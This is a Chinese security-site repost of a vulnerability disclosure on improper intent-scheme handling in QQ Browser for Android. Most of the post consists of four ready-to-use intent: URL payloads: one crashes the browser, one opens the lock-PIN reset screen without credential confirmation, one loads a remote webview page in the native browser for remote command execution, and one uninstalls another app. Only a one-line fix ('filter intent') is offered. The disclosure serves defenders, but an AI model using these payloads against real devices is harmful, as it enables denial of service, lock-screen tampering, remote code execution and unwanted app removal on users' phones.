频道栏目
首页 > 资讯 > 系统安全 > 正文

qq浏览器IntentScheme处理不当

14-11-01        来源:[db:作者]  
收藏   我要投稿

qq浏览器IntentScheme处理不当

IntentScheme未做过滤,可以植入恶意意图。


1.android all,浏览器拒绝服务



intent:#Intent;component=com.tencent.mtt/com.tencent.mtt.debug.DbgMemWatch;end

浏览器崩溃.png



2.android 3.x-4.3,重置PIN码

intent:#Intent;action=android.settings.SETTINGS;S.:android:show_fragment=com.android.settings.ChooseLockPassword$ChooseLockPasswordFragment;B.confirm_credentials=false;launchFlags=0x00008000;end


 
Screenshot_2014-08-25-12-44-49.png



3.android 4.2.2以下 结合其他app webview执行远程命令


intent:http://drops.wooyun.org/webview.html#Intent;component=com.android.browser/com.android.browser.BrowserActivity;end



poc为打开android 4.1的原生游览器
 

rce.png



4.android all 卸载其他app



intent:package:org.wooyun.hiwooyun#Intent;action=android.intent.action.DELETE;end

 

浏览器版本
 

版本.png

 

修复方案:

过滤intent


相关TAG标签
上一篇:腾讯要打造中国最好的创业孵化器
下一篇:浅析百度新算法重视相关性的核心原因
相关文章
图文推荐

关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报中心

版权所有: 红黑联盟--致力于做实用的IT技术学习网站